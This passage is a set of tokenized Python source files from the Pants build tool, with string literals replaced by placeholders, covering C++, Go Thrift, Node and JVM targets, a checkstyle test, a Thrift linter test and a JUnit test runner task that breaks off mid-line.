<s> from __future__ import ( absolute_import , division , generators , nested_scopes , print_function , <EOL> unicode_literals , with_statement ) <EOL> from pants . contrib . cpp . targets . cpp_target import CppTarget <EOL> class CppLibrary ( CppTarget ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , <EOL> * args , <EOL> ** kwargs ) : <EOL> super ( CppLibrary , self ) . __init__ ( * args , ** kwargs ) </s>
<s> from __future__ import ( absolute_import , division , generators , nested_scopes , print_function , <EOL> unicode_literals , with_statement ) <EOL> import os <EOL> import re <EOL> import subprocess <EOL> from pants . backend . codegen . subsystems . thrift_defaults import ThriftDefaults <EOL> from pants . backend . codegen . tasks . simple_codegen_task import SimpleCodegenTask <EOL> from pants . base . build_environment import get_buildroot <EOL> from pants . base . exceptions import TaskError <EOL> from pants . base . workunit import WorkUnitLabel <EOL> from pants . binaries . thrift_binary import ThriftBinary <EOL> from pants . util . dirutil import safe_mkdir <EOL> from pants . util . memo import memoized_property <EOL> from twitter . common . collections import OrderedSet <EOL> from pants . contrib . go . targets . go_thrift_library import GoThriftGenLibrary , GoThriftLibrary <EOL> class GoThriftGen ( SimpleCodegenTask ) : <EOL> @ classmethod <EOL> def register_options ( cls , register ) : <EOL> super ( GoThriftGen , cls ) . register_options ( register ) <EOL> register ( '<STR_LIT>' , default = True , fingerprint = True , type = bool , <EOL> help = '<STR_LIT>' ) <EOL> register ( '<STR_LIT>' , advanced = True , fingerprint = True , <EOL> help = '<STR_LIT>' ) <EOL> register ( '<STR_LIT>' , advanced = True , <EOL> help = '<STR_LIT>' ) <EOL> register ( '<STR_LIT>' , advanced = True , <EOL> help = '<STR_LIT>' ) <EOL> @ classmethod <EOL> def global_subsystems ( cls ) : <EOL> return super ( GoThriftGen , cls ) . global_subsystems ( ) + ( ThriftDefaults , ) <EOL> @ classmethod <EOL> def task_subsystems ( cls ) : <EOL> return super ( GoThriftGen , cls ) . task_subsystems ( ) + ( ThriftBinary . Factory , ) <EOL> @ classmethod <EOL> def subsystem_dependencies ( cls ) : <EOL> return ( super ( GoThriftGen , cls ) . subsystem_dependencies ( ) + <EOL> ( ThriftDefaults , ThriftBinary . Factory . scoped ( cls ) ) ) <EOL> @ memoized_property <EOL> def _thrift_binary ( self ) : <EOL> thrift_binary = ThriftBinary . Factory . scoped_instance ( self ) . create ( ) <EOL> return thrift_binary . path <EOL> @ memoized_property <EOL> def _deps ( self ) : <EOL> thrift_import_target = self . get_options ( ) . thrift_import_target <EOL> thrift_imports = self . context . resolve ( thrift_import_target ) <EOL> return thrift_imports <EOL> @ memoized_property <EOL> def _service_deps ( self ) : <EOL> service_deps = self . get_options ( ) . service_deps <EOL> return list ( self . resolve_deps ( service_deps ) ) if service_deps else self . _deps <EOL> SERVICE_PARSER = re . compile ( r'<STR_LIT>' ) <EOL> NAMESPACE_PARSER = re . compile ( r'<STR_LIT>' , re . MULTILINE ) <EOL> def _declares_service ( self , source ) : <EOL> with open ( source ) as thrift : <EOL> return any ( line for line in thrift if self . SERVICE_PARSER . search ( line ) ) <EOL> def _get_go_namespace ( self , source ) : <EOL> with open ( source ) as thrift : <EOL> namespace = self . NAMESPACE_PARSER . search ( thrift . read ( ) ) <EOL> if not namespace : <EOL> raise TaskError ( '<STR_LIT>' , source ) <EOL> return namespace . group ( <NUM_LIT:1> ) <EOL> def synthetic_target_extra_dependencies ( self , target , target_workdir ) : <EOL> for source in target . sources_relative_to_buildroot ( ) : <EOL> if self . _declares_service ( os . path . join ( get_buildroot ( ) , source ) ) : <EOL> return self . _service_deps <EOL> return self . _deps <EOL> def synthetic_target_type ( self , target ) : <EOL> return GoThriftGenLibrary <EOL> def is_gentarget ( self , target ) : <EOL> return isinstance ( target , GoThriftLibrary ) <EOL> @ memoized_property <EOL> def _thrift_cmd ( self ) : <EOL> cmd = [ self . _thrift_binary ] <EOL> thrift_import = '<STR_LIT>' . format ( self . get_options ( ) . thrift_import ) <EOL> gen_options = self . get_options ( ) . gen_options <EOL> if gen_options : <EOL> gen_options += '<STR_LIT:U+002C>' + thrift_import <EOL> else : <EOL> gen_options = thrift_import <EOL> cmd . extend ( ( '<STR_LIT>' , '<STR_LIT>' . format ( gen_options ) ) ) <EOL> if self . get_options ( ) . strict : <EOL> cmd . append ( '<STR_LIT>' ) <EOL> if self . get_options ( ) . level == '<STR_LIT>' : <EOL> cmd . append ( '<STR_LIT>' ) <EOL> return cmd <EOL> def _generate_thrift ( self , target , target_workdir ) : <EOL> target_cmd = self . _thrift_cmd [ : ] <EOL> bases = OrderedSet ( tgt . target_base for tgt in target . closure ( ) if self . is_gentarget ( tgt ) ) <EOL> for base in bases : <EOL> target_cmd . extend ( ( '<STR_LIT>' , base ) ) <EOL> target_cmd . extend ( ( '<STR_LIT>' , target_workdir ) ) <EOL> all_sources = list ( target . sources_relative_to_buildroot ( ) ) <EOL> if len ( all_sources ) != <NUM_LIT:1> : <EOL> raise TaskError ( '<STR_LIT>' , target ) <EOL> source = all_sources [ <NUM_LIT:0> ] <EOL> target_cmd . append ( os . path . join ( get_buildroot ( ) , source ) ) <EOL> with self . context . new_workunit ( name = source , <EOL> labels = [ WorkUnitLabel . TOOL ] , <EOL> cmd = '<STR_LIT:U+0020>' . join ( target_cmd ) ) as workunit : <EOL> result = subprocess . call ( target_cmd , <EOL> stdout = workunit . output ( '<STR_LIT>' ) , <EOL> stderr = workunit . output ( '<STR_LIT>' ) ) <EOL> if result != <NUM_LIT:0> : <EOL> raise TaskError ( '<STR_LIT>' . format ( self . _thrift_binary , result ) ) <EOL> gen_dir = os . path . join ( target_workdir , '<STR_LIT>' ) <EOL> src_dir = os . path . join ( target_workdir , '<STR_LIT:src>' ) <EOL> safe_mkdir ( src_dir ) <EOL> go_dir = os . path . join ( target_workdir , '<STR_LIT:src>' , '<STR_LIT>' ) <EOL> os . rename ( gen_dir , go_dir ) <EOL> @ classmethod <EOL> def product_types ( cls ) : <EOL> return [ '<STR_LIT>' ] <EOL> def execute_codegen ( self , target , target_workdir ) : <EOL> self . _generate_thrift ( target , target_workdir ) <EOL> def synthetic_target_dir ( self , target , target_workdir ) : <EOL> all_sources = list ( target . sources_relative_to_buildroot ( ) ) <EOL> source = all_sources [ <NUM_LIT:0> ] <EOL> namespace = self . _get_go_namespace ( source ) <EOL> return os . path . join ( target_workdir , '<STR_LIT:src>' , '<STR_LIT>' , namespace . replace ( "<STR_LIT:.>" , os . path . sep ) ) </s>
<s> from __future__ import ( absolute_import , division , generators , nested_scopes , print_function , <EOL> unicode_literals , with_statement ) <EOL> from pants . base . payload import Payload <EOL> from pants . base . payload_field import PrimitiveField <EOL> from pants . contrib . node . targets . node_package import NodePackage <EOL> class NodeRemoteModule ( NodePackage ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , version = None , address = None , payload = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> payload = payload or Payload ( ) <EOL> payload . add_fields ( { <EOL> '<STR_LIT:version>' : PrimitiveField ( version or '<STR_LIT:*>' ) , <EOL> } ) <EOL> super ( NodeRemoteModule , self ) . __init__ ( address = address , payload = payload , ** kwargs ) <EOL> @ property <EOL> def version ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . payload . version </s>
<s> from __future__ import ( absolute_import , division , generators , nested_scopes , print_function , <EOL> unicode_literals , with_statement ) <EOL> from pants . contrib . python . checks . tasks . checkstyle . plugin_subsystem_base import PluginSubsystemBase <EOL> class ImportOrderSubsystem ( PluginSubsystemBase ) : <EOL> options_scope = '<STR_LIT>' <EOL> def get_plugin_type ( self ) : <EOL> from pants . contrib . python . checks . tasks . checkstyle . import_order import ImportOrder <EOL> return ImportOrder </s>
<s> from __future__ import ( absolute_import , division , generators , nested_scopes , print_function , <EOL> unicode_literals , with_statement ) <EOL> from pants_test . contrib . python . checks . tasks . checkstyle . plugin_test_base import CheckstylePluginTestBase <EOL> from pants . contrib . python . checks . tasks . checkstyle . common import Nit , PythonFile <EOL> from pants . contrib . python . checks . tasks . checkstyle . future_compatibility import FutureCompatibility <EOL> BAD_CLASS = PythonFile . from_statement ( """<STR_LIT>""" ) <EOL> class FutureCompatibilityTest ( CheckstylePluginTestBase ) : <EOL> plugin_type = FutureCompatibility <EOL> def exemplar_fail ( self , code , severity , statement ) : <EOL> self . assertNit ( statement , code , severity ) <EOL> def exemplar_pass ( self , statement ) : <EOL> self . assertNoNits ( statement ) <EOL> def test_xrange ( self ) : <EOL> self . exemplar_fail ( '<STR_LIT>' , Nit . ERROR , """<STR_LIT>""" ) <EOL> self . exemplar_pass ( """<STR_LIT>""" ) <EOL> def test_iters ( self ) : <EOL> for function_name in FutureCompatibility . BAD_ITERS : <EOL> self . exemplar_fail ( '<STR_LIT>' , Nit . ERROR , """<STR_LIT>""" % function_name ) <EOL> def test_names ( self ) : <EOL> for class_name in FutureCompatibility . BAD_NAMES : <EOL> self . exemplar_fail ( '<STR_LIT>' , Nit . ERROR , """<STR_LIT>""" % class_name ) <EOL> def test_metaclass ( self ) : <EOL> self . exemplar_fail ( '<STR_LIT>' , Nit . WARNING , """<STR_LIT>""" ) </s>
<s> from __future__ import ( absolute_import , division , generators , nested_scopes , print_function , <EOL> unicode_literals , with_statement ) <EOL> from mock import Mock , patch <EOL> from pants . backend . codegen . targets . java_thrift_library import JavaThriftLibrary <EOL> from pants . build_graph . build_file_aliases import BuildFileAliases <EOL> from pants_test . tasks . task_test_base import TaskTestBase <EOL> from pants . contrib . scrooge . tasks . thrift_linter import ThriftLinter <EOL> class ThriftLinterTest ( TaskTestBase ) : <EOL> def _prepare_mocks ( self , task ) : <EOL> self . _run_java_mock = Mock ( return_value = <NUM_LIT:0> ) <EOL> task . tool_classpath = Mock ( return_value = '<STR_LIT>' ) <EOL> task . runjava = self . _run_java_mock <EOL> @ property <EOL> def alias_groups ( self ) : <EOL> return BuildFileAliases ( <EOL> targets = { <EOL> '<STR_LIT>' : JavaThriftLibrary , <EOL> } , <EOL> ) <EOL> @ classmethod <EOL> def task_type ( cls ) : <EOL> return ThriftLinter <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_lint ( self , mock_calculate_compile_sources ) : <EOL> def get_default_jvm_options ( ) : <EOL> return self . task_type ( ) . get_jvm_options_default ( self . context ( ) . options . for_global_scope ( ) ) <EOL> thrift_target = self . create_library ( '<STR_LIT:a>' , '<STR_LIT>' , '<STR_LIT:a>' , [ '<STR_LIT>' ] ) <EOL> task = self . create_task ( self . context ( target_roots = thrift_target ) ) <EOL> self . _prepare_mocks ( task ) <EOL> expected_include_paths = { '<STR_LIT>' , '<STR_LIT>' } <EOL> expected_paths = { '<STR_LIT>' , '<STR_LIT>' } <EOL> mock_calculate_compile_sources . return_value = ( expected_include_paths , expected_paths ) <EOL> task . _lint ( thrift_target ) <EOL> self . _run_java_mock . assert_called_once_with ( classpath = '<STR_LIT>' , <EOL> main = '<STR_LIT>' , <EOL> args = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> jvm_options = get_default_jvm_options ( ) , <EOL> workunit_labels = [ '<STR_LIT>' ] ) </s>
<s> from __future__ import ( absolute_import , division , generators , nested_scopes , print_function , <EOL> unicode_literals , with_statement ) <EOL> from pants . backend . jvm . targets . jvm_target import JvmTarget <EOL> from pants . base . payload import Payload <EOL> from pants . base . payload_field import PrimitiveField <EOL> class JaxbLibrary ( JvmTarget ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , payload = None , package = None , language = '<STR_LIT>' , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> payload = payload or Payload ( ) <EOL> payload . add_fields ( { <EOL> '<STR_LIT>' : PrimitiveField ( package ) , <EOL> '<STR_LIT>' : PrimitiveField ( language ) , <EOL> } ) <EOL> super ( JaxbLibrary , self ) . __init__ ( payload = payload , ** kwargs ) <EOL> self . add_labels ( '<STR_LIT>' ) <EOL> self . add_labels ( '<STR_LIT>' ) <EOL> if language != '<STR_LIT>' : <EOL> raise ValueError ( '<STR_LIT>' <EOL> . format ( lang = language , class_type = type ( self ) . __name__ ) ) <EOL> @ property <EOL> def package ( self ) : <EOL> return self . payload . package </s>
<s> from __future__ import ( absolute_import , division , generators , nested_scopes , print_function , <EOL> unicode_literals , with_statement ) <EOL> from six import string_types <EOL> from pants . backend . jvm . repository import Repository <EOL> from pants . base . payload_field import PayloadField , stable_json_sha1 <EOL> class PublicationMetadata ( PayloadField ) : <EOL> """<STR_LIT>""" <EOL> class Artifact ( PayloadField ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , org , name , repo , publication_metadata = None ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( org , string_types ) : <EOL> raise ValueError ( "<STR_LIT>" . format ( string_types , org ) ) <EOL> if not isinstance ( name , string_types ) : <EOL> raise ValueError ( "<STR_LIT>" . format ( string_types , name ) ) <EOL> if not isinstance ( repo , Repository ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> if ( publication_metadata is not None <EOL> and not isinstance ( publication_metadata , PublicationMetadata ) ) : <EOL> raise ValueError ( "<STR_LIT>" <EOL> . format ( PublicationMetadata , type ( publication_metadata ) ) ) <EOL> self . org = org <EOL> self . _base_name = name <EOL> self . repo = repo <EOL> self . publication_metadata = publication_metadata <EOL> @ property <EOL> def name ( self ) : <EOL> return self . _base_name <EOL> @ name . setter <EOL> def name ( self , value ) : <EOL> self . _base_name = value <EOL> def __eq__ ( self , other ) : <EOL> return ( type ( other ) == Artifact and <EOL> self . org == other . org and <EOL> self . name == other . name ) <EOL> def __hash__ ( self ) : <EOL> return hash ( ( self . org , self . name ) ) <EOL> def _compute_fingerprint ( self ) : <EOL> data = ( self . org , self . name ) <EOL> data += ( None , ) <EOL> if self . publication_metadata : <EOL> fingerprint = self . publication_metadata . fingerprint ( ) <EOL> if fingerprint : <EOL> data += ( fingerprint , ) <EOL> return stable_json_sha1 ( data ) <EOL> def __ne__ ( self , other ) : <EOL> return not self . __eq__ ( other ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" . format ( self . org , self . name , self . repo ) </s>
<s> from __future__ import ( absolute_import , division , generators , nested_scopes , print_function , <EOL> unicode_literals , with_statement ) <EOL> import os <EOL> from collections import OrderedDict , namedtuple <EOL> from hashlib import sha1 <EOL> import six <EOL> from twitter . common . dirutil import Fileset <EOL> from pants . backend . jvm . targets . jvm_binary import JvmBinary <EOL> from pants . base . build_environment import get_buildroot <EOL> from pants . base . exceptions import TargetDefinitionException <EOL> from pants . base . payload import Payload <EOL> from pants . base . payload_field import PayloadField , PrimitiveField , combine_hashes <EOL> from pants . base . validation import assert_list <EOL> from pants . build_graph . target import Target <EOL> from pants . source . wrapped_globs import FilesetWithSpec <EOL> from pants . util . dirutil import fast_relpath <EOL> from pants . util . memo import memoized_property <EOL> class RelativeToMapper ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , base ) : <EOL> """<STR_LIT>""" <EOL> self . base = base <EOL> def __call__ ( self , path ) : <EOL> return os . path . relpath ( path , self . base ) <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' . format ( self . base ) <EOL> def __hash__ ( self ) : <EOL> return hash ( self . base ) <EOL> class DirectoryReMapper ( object ) : <EOL> """<STR_LIT>""" <EOL> class NonexistentBaseError ( Exception ) : <EOL> pass <EOL> def __init__ ( self , base , dest ) : <EOL> """<STR_LIT>""" <EOL> self . base = os . path . abspath ( os . path . join ( get_buildroot ( ) , base ) ) <EOL> if not os . path . isdir ( self . base ) : <EOL> raise DirectoryReMapper . NonexistentBaseError ( <EOL> '<STR_LIT>' . format ( self . base ) ) <EOL> self . dest = dest <EOL> def __call__ ( self , path ) : <EOL> return os . path . join ( self . dest , os . path . relpath ( path , self . base ) ) <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' . format ( self . base , self . dest ) <EOL> class BundleProps ( namedtuple ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) ) : <EOL> @ memoized_property <EOL> def filemap ( self ) : <EOL> filemap = OrderedDict ( ) <EOL> if self . fileset is not None : <EOL> paths = self . fileset ( ) if isinstance ( self . fileset , Fileset ) else self . fileset if hasattr ( self . fileset , '<STR_LIT>' ) else [ self . fileset ] <EOL> for path in paths : <EOL> abspath = path <EOL> if not os . path . isabs ( abspath ) : <EOL> abspath = os . path . join ( get_buildroot ( ) , self . rel_path , path ) <EOL> filemap [ abspath ] = self . mapper ( abspath ) <EOL> return filemap <EOL> def __hash__ ( self ) : <EOL> return hash ( ( self . rel_path , self . mapper ) ) <EOL> class Bundle ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , parse_context ) : <EOL> self . _rel_path = parse_context . rel_path <EOL> def __call__ ( self , rel_path = None , mapper = None , relative_to = None , fileset = None ) : <EOL> """<STR_LIT>""" <EOL> if mapper and relative_to : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> if rel_path and isinstance ( fileset , FilesetWithSpec ) : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> if isinstance ( fileset , FilesetWithSpec ) : <EOL> pass <EOL> elif isinstance ( fileset , six . string_types ) : <EOL> fileset = [ fileset ] <EOL> else : <EOL> fileset = assert_list ( fileset , key_arg = '<STR_LIT>' ) <EOL> real_rel_path = rel_path or self . _rel_path <EOL> if relative_to : <EOL> base = os . path . join ( get_buildroot ( ) , real_rel_path , relative_to ) <EOL> mapper = RelativeToMapper ( base ) <EOL> else : <EOL> mapper = mapper or RelativeToMapper ( os . path . join ( get_buildroot ( ) , real_rel_path ) ) <EOL> return BundleProps ( real_rel_path , mapper , fileset ) <EOL> class BundleField ( tuple , PayloadField ) : <EOL> """<STR_LIT>""" <EOL> @ staticmethod <EOL> def _hash_bundle ( bundle ) : <EOL> hasher = sha1 ( ) <EOL> hasher . update ( bundle . rel_path ) <EOL> for abs_path in sorted ( bundle . filemap . keys ( ) ) : <EOL> buildroot_relative_path = os . path . relpath ( abs_path , get_buildroot ( ) ) <EOL> hasher . update ( buildroot_relative_path ) <EOL> hasher . update ( bundle . filemap [ abs_path ] ) <EOL> if os . path . isfile ( abs_path ) : <EOL> hasher . update ( '<STR_LIT:e>' ) <EOL> with open ( abs_path , '<STR_LIT:rb>' ) as f : <EOL> hasher . update ( f . read ( ) ) <EOL> return hasher . hexdigest ( ) <EOL> def _compute_fingerprint ( self ) : <EOL> return combine_hashes ( map ( BundleField . _hash_bundle , self ) ) <EOL> class JvmApp ( Target ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , name = None , payload = None , binary = None , bundles = None , basename = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> payload = payload or Payload ( ) <EOL> payload . add_fields ( { <EOL> '<STR_LIT>' : PrimitiveField ( basename or name ) , <EOL> '<STR_LIT>' : PrimitiveField ( binary ) , <EOL> '<STR_LIT>' : BundleField ( bundles or [ ] ) , <EOL> } ) <EOL> super ( JvmApp , self ) . __init__ ( name = name , payload = payload , ** kwargs ) <EOL> if name == basename : <EOL> raise TargetDefinitionException ( self , '<STR_LIT>' ) <EOL> def globs_relative_to_buildroot ( self ) : <EOL> buildroot = get_buildroot ( ) <EOL> globs = [ ] <EOL> for bundle in self . bundles : <EOL> fileset = bundle . fileset <EOL> if fileset is None : <EOL> continue <EOL> elif hasattr ( fileset , '<STR_LIT>' ) : <EOL> globs += bundle . fileset . filespec [ '<STR_LIT>' ] <EOL> else : <EOL> globs += [ fast_relpath ( f , buildroot ) for f in bundle . filemap . keys ( ) ] <EOL> super_globs = super ( JvmApp , self ) . globs_relative_to_buildroot ( ) <EOL> if super_globs : <EOL> globs += super_globs [ '<STR_LIT>' ] <EOL> return { '<STR_LIT>' : globs } <EOL> @ property <EOL> def traversable_dependency_specs ( self ) : <EOL> for spec in super ( JvmApp , self ) . traversable_dependency_specs : <EOL> yield spec <EOL> if self . payload . binary : <EOL> yield self . payload . binary <EOL> @ property <EOL> def basename ( self ) : <EOL> return self . payload . basename <EOL> @ property <EOL> def bundles ( self ) : <EOL> return self . payload . bundles <EOL> @ property <EOL> def binary ( self ) : <EOL> """<STR_LIT>""" <EOL> dependencies = self . dependencies <EOL> if len ( dependencies ) != <NUM_LIT:1> : <EOL> raise TargetDefinitionException ( self , '<STR_LIT>' <EOL> '<STR_LIT>' . format ( dependencies ) ) <EOL> binary = dependencies [ <NUM_LIT:0> ] <EOL> if not isinstance ( binary , JvmBinary ) : <EOL> raise TargetDefinitionException ( self , '<STR_LIT>' <EOL> '<STR_LIT>' . format ( binary ) ) <EOL> return binary <EOL> @ property <EOL> def jar_dependencies ( self ) : <EOL> return self . binary . jar_dependencies </s>
<s> from __future__ import ( absolute_import , division , generators , nested_scopes , print_function , <EOL> unicode_literals , with_statement ) <EOL> import copy <EOL> import os <EOL> import sys <EOL> from collections import defaultdict <EOL> from six . moves import range <EOL> from twitter . common . collections import OrderedSet <EOL> from pants . backend . jvm . subsystems . jvm_platform import JvmPlatform <EOL> from pants . backend . jvm . subsystems . shader import Shader <EOL> from pants . backend . jvm . targets . jar_dependency import JarDependency <EOL> from pants . backend . jvm . targets . java_tests import JavaTests as junit_tests <EOL> from pants . backend . jvm . targets . jvm_target import JvmTarget <EOL> from pants . backend . jvm . tasks . classpath_util import ClasspathUtil <EOL> from pants . backend . jvm . tasks . coverage . base import Coverage <EOL> from pants . backend . jvm . tasks . coverage . cobertura import Cobertura , CoberturaTaskSettings <EOL> from pants . backend . jvm . tasks . jvm_task import JvmTask <EOL> from pants . backend . jvm . tasks . jvm_tool_task_mixin import JvmToolTaskMixin <EOL> from pants . base . build_environment import get_buildroot <EOL> from pants . base . exceptions import TargetDefinitionException , TaskError , TestFailedTaskError <EOL> from pants . base . workunit import WorkUnitLabel <EOL> from pants . binaries import binary_util <EOL> from pants . build_graph . target_scopes import Scopes <EOL> from pants . java . distribution . distribution import DistributionLocator <EOL> from pants . java . executor import SubprocessExecutor <EOL> from pants . task . testrunner_task_mixin import TestRunnerTaskMixin <EOL> from pants . util . argutil import ensure_arg , remove_arg <EOL> from pants . util . contextutil import environment_as <EOL> from pants . util . strutil import pluralize <EOL> from pants . util . xml_parser import XmlParser <EOL> def _classfile_to_classname ( cls ) : <EOL> return ClasspathUtil . classname_for_rel_classfile ( cls ) <EOL> def interpret_test_spec ( test_spec ) : <EOL> """<STR_LIT>""" <EOL> components = test_spec . split ( '<STR_LIT:#>' , <NUM_LIT:2> ) <EOL> classname_or_srcfile = components [ <NUM_LIT:0> ] <EOL> methodname = '<STR_LIT:#>' + components [ <NUM_LIT:1> ] if len ( components ) == <NUM_LIT:2> else '<STR_LIT>' <EOL> if os . path . exists ( classname_or_srcfile ) : <EOL> return ( ( classname_or_srcfile , methodname ) , None ) <EOL> else : <EOL> return ( None , ( classname_or_srcfile , methodname ) ) <EOL> class JUnitRun ( TestRunnerTaskMixin , JvmToolTaskMixin , JvmTask ) : <EOL> """<STR_LIT>""" <EOL> _MAIN = '<STR_LIT>' <EOL> @ classmethod <EOL> def register_options ( cls , register ) : <EOL> super ( JUnitRun , cls ) . register_options ( register ) <EOL> register ( '<STR_LIT>' , advanced = True , type = int , default = sys . maxint , <EOL> help = '<STR_LIT>' ) <EOL> register ( '<STR_LIT>' , type = list , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> register ( '<STR_LIT>' , type = bool , help = '<STR_LIT>' ) <EOL> register ( '<STR_LIT>' , advanced = True , <EOL> choices = junit_tests . VALID_CONCURRENCY_OPTS , default = junit_tests . CONCURRENCY_SERIAL , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> register ( '<STR_LIT>' , advanced = True , type = bool , <EOL> removal_hint = '<STR_LIT>' , removal_version = '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> register ( '<STR_LIT>' , advanced = True , type = int , default = <NUM_LIT:0> , <EOL> help = '<STR_LIT>' ) <EOL> register ( '<STR_LIT>' , advanced = True , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> register ( '<STR_LIT>' , choices = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , default = '<STR_LIT>' , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> register ( '<STR_LIT>' , advanced = True , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> register ( '<STR_LIT>' , type = bool , advanced = True , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> register ( '<STR_LIT>' , type = bool , default = True , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> register ( '<STR_LIT>' , type = bool , advanced = True , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> cls . register_jvm_tool ( register , <EOL> '<STR_LIT>' , <EOL> classpath = [ <EOL> JarDependency ( org = '<STR_LIT>' , name = '<STR_LIT>' , rev = '<STR_LIT>' ) , <EOL> ] , <EOL> main = JUnitRun . _MAIN , <EOL> custom_rules = [ <EOL> Shader . exclude_package ( '<STR_LIT>' , recursive = True ) , <EOL> Shader . exclude_package ( '<STR_LIT>' , recursive = True ) , <EOL> Shader . exclude_package ( '<STR_LIT>' , recursive = True ) , <EOL> Shader . exclude_package ( '<STR_LIT>' , recursive = True ) , <EOL> ] ) <EOL> for c in [ Coverage , Cobertura ] : <EOL> c . register_options ( register , cls . register_jvm_tool ) <EOL> @ classmethod <EOL> def subsystem_dependencies ( cls ) : <EOL> return super ( JUnitRun , cls ) . subsystem_dependencies ( ) + ( DistributionLocator , ) <EOL> @ classmethod <EOL> def request_classes_by_source ( cls , test_specs ) : <EOL> """<STR_LIT>""" <EOL> for test_spec in test_specs : <EOL> src_spec , _ = interpret_test_spec ( test_spec ) <EOL> if src_spec : <EOL> return True <EOL> return False <EOL> @ classmethod <EOL> def prepare ( cls , options , round_manager ) : <EOL> super ( JUnitRun , cls ) . prepare ( options , round_manager ) <EOL> round_manager . require_data ( '<STR_LIT>' ) <EOL> if cls . request_classes_by_source ( options . test or [ ] ) : <EOL> round_manager . require_data ( '<STR_LIT>' ) <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> super ( JUnitRun , self ) . __init__ ( * args , ** kwargs ) <EOL> options = self . get_options ( ) <EOL> self . _coverage = None <EOL> if options . coverage or options . is_flagged ( '<STR_LIT>' ) : <EOL> coverage_processor = options . coverage_processor <EOL> if coverage_processor == '<STR_LIT>' : <EOL> settings = CoberturaTaskSettings . from_task ( self ) <EOL> self . _coverage = Cobertura ( settings ) <EOL> else : <EOL> raise TaskError ( '<STR_LIT>' . format ( coverage_processor ) ) <EOL> self . _tests_to_run = options . test <EOL> self . _batch_size = options . batch_size <EOL> self . _fail_fast = options . fail_fast <EOL> self . _working_dir = options . cwd or get_buildroot ( ) <EOL> self . _strict_jvm_version = options . strict_jvm_version <EOL> self . _args = copy . copy ( self . args ) <EOL> self . _failure_summary = options . failure_summary <EOL> if options . output_mode == '<STR_LIT>' : <EOL> self . _args . append ( '<STR_LIT>' ) <EOL> elif options . output_mode == '<STR_LIT>' : <EOL> self . _args . append ( '<STR_LIT>' ) <EOL> else : <EOL> self . _args . append ( '<STR_LIT>' ) <EOL> if self . _fail_fast : <EOL> self . _args . append ( '<STR_LIT>' ) <EOL> self . _args . append ( '<STR_LIT>' ) <EOL> self . _args . append ( self . workdir ) <EOL> if options . per_test_timer : <EOL> self . _args . append ( '<STR_LIT>' ) <EOL> if options . default_parallel : <EOL> self . _args . append ( '<STR_LIT>' ) <EOL> if options . default_concurrency == junit_tests . CONCURRENCY_PARALLEL_BOTH : <EOL> self . context . log . warn ( '<STR_LIT>' ) <EOL> self . _args . append ( '<STR_LIT>' ) <EOL> self . _args . append ( '<STR_LIT>' ) <EOL> elif options . default_concurrency == junit_tests . CONCURRENCY_PARALLEL_CLASSES : <EOL> self . _args . append ( '<STR_LIT>' ) <EOL> elif options . default_concurrency == junit_tests . CONCURRENCY_PARALLEL_METHODS : <EOL> self . context . log . warn ( '<STR_LIT>' ) <EOL> raise NotImplementedError ( ) <EOL> elif options . default_concurrency == junit_tests . CONCURRENCY_SERIAL : <EOL> pass <EOL> self . _args . append ( '<STR_LIT>' ) <EOL> self . _args . append ( str ( options . parallel_threads ) ) <EOL> if options . test_shard : <EOL> self . _args . append ( '<STR_LIT>' ) <EOL> self . _args . append ( options . test_shard ) <EOL> def classpath ( self , targets , classpath_product = None ) : <EOL> return super ( JUnitRun , self ) . classpath ( targets , classpath_product = classpath_product , <EOL> include_scopes = Scopes . JVM_TEST_SCOPES ) <EOL> def preferred_jvm_distribution_for_targets ( self , targets ) : <EOL> return JvmPlatform . preferred_jvm_distribution ( [ target . platform for target in targets <EOL> if isinstance ( target , JvmTarget ) ] , <EOL> self . _strict_jvm_version ) <EOL> def _spawn ( self , distribution , executor = None , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> actual_executor = executor or SubprocessExecutor ( distribution ) <EOL> return distribution . execute_java_async ( * args , <EOL> executor = actual_executor , <EOL> ** kwargs ) <EOL> def execute_java_for_targets ( self , targets , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> distribution = self . preferred_jvm_distribution_for_targets ( targets ) <EOL> actual_executor = kwargs . get ( '<STR_LIT>' ) or SubprocessExecutor ( distribution ) <EOL> return self . _spawn_and_wait ( * args , executor = actual_executor , distribution = distribution , ** kwargs ) <EOL> def execute_java_for_coverage ( self , targets , executor = None , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> distribution = self . 